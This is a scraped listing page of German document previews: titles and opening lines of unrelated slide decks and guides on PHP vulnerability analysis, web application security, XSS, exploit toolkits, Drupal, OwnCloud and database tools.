BSI - 12. Deutscher IT-Sicherheitskongress 10.-12. Mai.2011, Bonn Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse, Ruhr-Universität Bochum 1 1.1 Motivation Schwachstellen
MehrPCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick:
Beweisen Sie Ihre Sicherheit! Unser Security Scan ist eine Sicherheitsmaßnahme, die sich auszahlt. Systeme ändern sich ständig. Selbst Spezialisten kennen nicht alle Schwachstellen im Detail. Der PCI Scan
MehrWeb Applications Wie können sie geschützt werden?
Whitepaper // Web Applications Web Applications Wie können sie geschützt werden? Obwohl die Webseite eines Unternehmens ein enorm wichtiger Erfolgsfaktor ist, wird die Bedeutung der Sicherheit von Web-Applikationen
MehrDie ideale PHP-Entwicklungsumgebung für IBM i Programmierer
Die ideale PHP-Entwicklungsumgebung für IBM i Programmierer Jan Burkl Solution Consultant jan@zend.com Agenda Zend Server 5.1 Update Technische Übersicht von Zend Studio Remote Server Setup Remote Projects
MehrAnleitung: Verbindung mit der Datenbank
Anleitung: Verbindung mit der Datenbank Der Zugriff auf die MySQL-Datenbank selbst kann mit sämtlichen dafür erhältlichen Tools (Beispielsweise SquirrelSQL, Toad für MySQL, EMS SQL Manager, TOra oder ähnliches)
MehrEntwicklerCamp Extending Lotus Notes Widgets, Livetext, Plugins
EntwicklerCamp 2012 Extending Lotus Notes Widgets, Livetext, Plugins Detlev Pö.gen midpoints GmbH www.midpoints.de midpoints GmbH h.p://www.midpoints.de IBM Advanced Business Partner IBM Design Partner
MehrFolgende Voraussetzungen für die Konfiguration müssen erfüllt sein:
7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,
MehrRaffinierte Shell Scripts
COk - 2008 AGI-Information Management Consultants May be used for personal purporses only or by libraries associated to dandelon.com network. Dave Taylor Raffinierte Shell Scripts Übersetzung aus dem Amerikanischen
MehrOwnCloud. Florian Preinstorfer. http://nblock.org VALUG 14.02.2014
OwnCloud Florian Preinstorfer http://nblock.org VALUG 14.02.2014 This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 Austria license (CC-BY-SA). Inhalt Einleitung OwnCloud Editions
MehrWeb Exploit Toolkits - Moderne Infektionsroutinen -
Web Exploit Toolkits - Moderne Infektionsroutinen - Dominik Birk - Christoph Wegener 16. DFN Workshop Sicherheit in vernetzten Systemen Hannover, 18. März 2009 1 Die Vortragenden Dominik Birk Mitarbeiter
MehrOracle Data Integrator Ein Überblick
Oracle Data Integrator Ein Überblick Uwe Barz Christoph Jansen Hamburg, 15.04.2008 Basel Baden Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg München Stuttgart Wien Agenda Überblick
MehrDAS EINSTEIGERSEMINAR. Drupal 6. von Thorsten P Luhm. 1. Auflage. Drupal 6 Luhm schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG
DAS EINSTEIGERSEMINAR Drupal 6 von Thorsten P Luhm 1. Auflage Drupal 6 Luhm schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG mitp/bhv 2008 Verlag C.H. Beck im Internet: www.beck.de
MehrSind Cloud Apps der nächste Hype?
Java Forum Stuttgart 2012 Sind Cloud Apps der nächste Hype? Tillmann Schall Stuttgart, 5. Juli 2012 : Agenda Was sind Cloud Apps? Einordnung / Vergleich mit bestehenden Cloud Konzepten Live Demo Aufbau
MehrOWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes
OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen
Mehr